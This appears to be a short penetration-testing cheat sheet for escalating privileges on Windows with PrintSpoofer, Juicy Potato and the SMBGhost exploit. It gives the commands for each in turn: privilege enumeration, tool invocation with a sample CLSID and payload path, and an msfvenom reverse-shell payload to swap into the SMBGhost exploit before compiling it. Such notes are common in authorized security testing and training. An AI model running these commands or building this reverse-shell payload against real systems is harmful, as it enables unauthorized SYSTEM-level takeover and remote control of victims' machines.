Tools

PrintSpoofer

GitHub - itm4n/PrintSpoofer: Abusing impersonation privileges through the "Printer Bug"GitHub

User enum

whoami /all

if SeAssignPrimaryToken or SeImpersonate you're good to go (Y)

Execute the following command:

PrintSpoofer.exe -i -c cmd

Juicy Potato

GitHub - ohpe/juicy-potato: A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM.GitHub

User enum

whoami /all

if SeAssignPrimaryToken or SeImpersonate you're good to go (Y)

Check for the OS system, and then use the CLSID from:

http://ohpe.it/juicy-potato/CLSID/ohpe.it

Execute the following command (using you CLSID):

juicypotato.exe -t <u/t> -p <file to execute> -l <port> -c "{<CLSID>}"
juicypotato.exe -t * -p C:\Windows\Temp\8009.exe -l 6989 -c "{1ecca34c-e88a-44e3-8d6a-8921bde9e452}"

SMBGhost

GitHub - danigargu/CVE-2020-0796: CVE-2020-0796 - Windows SMBv3 LPE exploit #SMBGhostGitHub

Starting with line 204 in exploit.cpp, replace the shellcode with a reverse shell:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f dll -f csharp

Using Visual Studio set the target to x64 and Release and compile the exploit.